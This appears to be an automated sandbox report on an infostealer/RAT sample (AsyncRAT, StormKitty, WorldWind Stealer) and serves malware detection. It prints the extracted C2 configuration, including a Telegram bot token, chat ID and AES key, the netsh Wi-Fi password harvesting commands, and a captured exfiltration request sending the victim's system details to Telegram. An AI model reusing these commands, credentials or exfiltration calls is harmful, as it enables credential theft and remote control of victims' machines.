Edit tour

Windows Analysis Report
eEo6DAcnnx.exe

Overview

General Information

Sample name:	eEo6DAcnnx.exe renamed because original name is a hash value
Original sample name:	720b2d599314eaf90cd60038f7e7d2e8.exe
Analysis ID:	1487531
MD5:	720b2d599314eaf90cd60038f7e7d2e8
SHA1:	76592e0a64b599fbb49d006faa2de4211dd79834
SHA256:	ea520d8e6ca1d44593f26ceea349d55709ebd61565f67368947d38e484f5846f
Tags:	32AsyncRATexe
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected AsyncRAT

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected WorldWind Stealer

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious desktop.ini Action

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

eEo6DAcnnx.exe (PID: 1540 cmdline: "C:\Users\user\Desktop\eEo6DAcnnx.exe" MD5: 720B2D599314EAF90CD60038F7E7D2E8)

cmd.exe (PID: 4860 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5980 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 5812 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 1096 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3184 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2192 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 1816 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
eEo6DAcnnx.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
eEo6DAcnnx.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
eEo6DAcnnx.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
eEo6DAcnnx.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
eEo6DAcnnx.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
eEo6DAcnnx.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
eEo6DAcnnx.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
eEo6DAcnnx.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
eEo6DAcnnx.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
eEo6DAcnnx.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
eEo6DAcnnx.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x318d4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: eEo6DAcnnx.exe PID: 1540	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: eEo6DAcnnx.exe PID: 1540	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: eEo6DAcnnx.exe PID: 1540	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: eEo6DAcnnx.exe PID: 1540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: eEo6DAcnnx.exe PID: 1540	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: eEo6DAcnnx.exe PID: 1540	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x76966:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: eEo6DAcnnx.exe PID: 1540	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x34c03:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x75484:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.eEo6DAcnnx.exe.900000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.eEo6DAcnnx.exe.900000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.0.eEo6DAcnnx.exe.900000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.eEo6DAcnnx.exe.900000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.eEo6DAcnnx.exe.900000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.eEo6DAcnnx.exe.900000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.0.eEo6DAcnnx.exe.900000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.eEo6DAcnnx.exe.900000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
0.0.eEo6DAcnnx.exe.900000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.eEo6DAcnnx.exe.900000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\eEo6DAcnnx.exe, ProcessId: 1540, TargetFilename: C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\eEo6DAcnnx.exe", ParentImage: C:\Users\user\Desktop\eEo6DAcnnx.exe, ParentProcessId: 1540, ParentProcessName: eEo6DAcnnx.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 4860, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE WorldWind Stealer Checkin via Telegram (GET) - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-04T14:57:44.447804+0200
SID:	2044766
Source Port:	49720
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-04T14:57:45.338829+0200
SID:	2803305
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: eEo6DAcnnx.exe	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}
Source: eEo6DAcnnx.exe.1540.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Source: eEo6DAcnnx.exe	ReversingLabs: Detection: 84%
Source: eEo6DAcnnx.exe	Virustotal: Detection: 86%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: eEo6DAcnnx.exe

Joe Sandbox ML: detected

Source: eEo6DAcnnx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49720 version: TLS 1.2

Source: eEo6DAcnnx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-08-04%208:57:31%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20715575%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20U2FFA%0ARAM:%204095MB%0AHWID:%208E348CD443%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%